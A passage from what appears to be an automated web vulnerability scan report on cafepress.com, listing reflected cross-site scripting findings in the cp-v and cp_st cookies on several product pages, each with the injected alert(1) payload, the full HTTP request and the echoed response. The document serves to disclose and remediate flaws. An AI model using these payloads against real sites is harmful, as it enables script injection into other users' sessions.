__utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59633
Date: Sun, 26 Dec 2010 13:49:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:00 GMT; path=/
Set-Cookie: cp_sc=201674; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:00 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h...[SNIP]...
= 'cafepress.com';
window.cafepress.originCountryCode = 'US'
window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'cd3b0</script><script>alert(1)</script>6a078ca5ef1 '
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.64. http://www.cafepress.com/+sweatshirts-hoodies [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+sweatshirts-hoodies
Issue detail
The value of the cp-v cookie is copied into a JavaScript string literal delimited by double quotation marks (the s.eVar30 = "..." assignment in the response below, a web-analytics variable). The payload 9849b"-alert(1)-"0b830c7e51f was submitted in the cp-v cookie and was echoed unmodified in the application's response. The embedded double quote closes the literal, and the surrounding minus signs turn the assignment into the expression "..." - alert(1) - "...", which is syntactically valid and calls alert(1) when the script runs; no angle brackets are needed, so an HTML-encoding filter that leaves quotes alone would not stop it. This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. Because the injected data arrives in a cookie, the behaviour is not trivial to exploit against another user: the attacker first needs a way to set cp-v in the victim's browser, for example through a content injection on any other host under cafepress.com, or as an active network attacker on a plain-HTTP page, since the cookies are scoped to domain=cafepress.com. This limitation reduces the impact of the vulnerability but does not remove it.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+sweatshirts-hoodies HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA9849b"-alert(1)-"0b830c7e51f ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 60350
Date: Sun, 26 Dec 2010 13:46:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:59 GMT; path=/
Set-Cookie: cp_sc=100031; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:59 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 60350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";
s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA9849b"-alert(1)-"0b830c7e51f ";
s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate
} el...[SNIP]...
1.65. http://www.cafepress.com/+sweatshirts-hoodies [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+sweatshirts-hoodies
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19caf</script><script>alert(1)</script>e4e8e544a2a was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+sweatshirts-hoodies HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=19caf</script><script>alert(1)</script>e4e8e544a2a ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 60367
Date: Sun, 26 Dec 2010 13:46:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:57 GMT; path=/
Set-Cookie: cp_sc=100031; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:57 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 60367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h...[SNIP]...
= 'cafepress.com';
window.cafepress.originCountryCode = 'US'
window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '19caf</script><script>alert(1)</script>e4e8e544a2a '
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.66. http://www.cafepress.com/+thermos [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+thermos
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 179e4"-alert(1)-"9112d7547c6 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+thermos HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA179e4"-alert(1)-"9112d7547c6 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 58907
Date: Sun, 26 Dec 2010 13:47:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:30 GMT; path=/
Set-Cookie: cp_sc=100465; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:30 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";
s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA179e4"-alert(1)-"9112d7547c6 ";
s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate
} el...[SNIP]...
1.67. http://www.cafepress.com/+thermos [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+thermos
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dee73</script><script>alert(1)</script>b29a0dee205 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+thermos HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=dee73</script><script>alert(1)</script>b29a0dee205 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 58934
Date: Sun, 26 Dec 2010 13:47:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:29 GMT; path=/
Set-Cookie: cp_sc=100465; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:29 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h...[SNIP]...
= 'cafepress.com';
window.cafepress.originCountryCode = 'US'
window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'dee73</script><script>alert(1)</script>b29a0dee205 '
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.68. http://www.cafepress.com/+underwear-panties [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+underwear-panties
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f16ed"-alert(1)-"d43c21ef02f was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+underwear-panties HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAf16ed"-alert(1)-"d43c21ef02f ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 59420
Date: Sun, 26 Dec 2010 13:47:21 GMT
Connection: close
